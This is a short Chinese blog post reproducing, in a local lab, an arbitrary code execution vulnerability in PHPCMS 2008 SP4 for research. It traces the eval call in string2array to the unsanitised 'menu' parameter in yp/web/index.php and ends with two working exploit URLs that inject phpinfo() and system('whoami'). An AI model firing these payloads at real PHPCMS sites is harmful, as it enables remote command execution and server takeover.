*文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。
phpcms2008 sp4 任意代码执行漏洞复现
一、搭建环境
1,因为phpcms 2008 sp4是很老的版本,所以安装的时候,.sql数据库文件都使用的TYPE方式安装的,所以需要将所有的.sql文件里TYPE=MYISAM 替换为 ENGINE=MYISAM, TYPE=MEMORY 替换为 ENGINE=MEMORY才可以安装成功,或者mysql数据库版本要低于5.0
2,安装成功,可正常访问后台
二、漏洞复现
1,查询资料,发现在在 phpcms2008/include/global.func.php
eval可以执行命令
2,根据string2array函数,发现在yp/web/include/common.inc.php
$menu变量初始化不严,导致可以执行任意代码
3,访问 common.inc.php是无法访问的,搜索一下,看看有哪些文件调用common.inc.php
4,发现yp/web/index.php会去调用common.inc.php
5,进行漏洞利用,yp/web/index.php执行访问,会报错站点不存在,
6,重新打开yp/web/include/common.php文件,发现需要$userid才可以访问
7,加上userid之后,成功复现漏洞,执行了代码
http://127.0.0.1/phpcms/yp/web/index.php?userid=1&&menu=phpinfo()
http://127.0.0.1/phpcms/yp/web/index.php?userid=1&&menu=system(‘whoami‘)
2019-11-13:phpcms 2008 sp4,任意代码执行漏洞复现
原文:https://www.cnblogs.com/sym945/p/11853116.html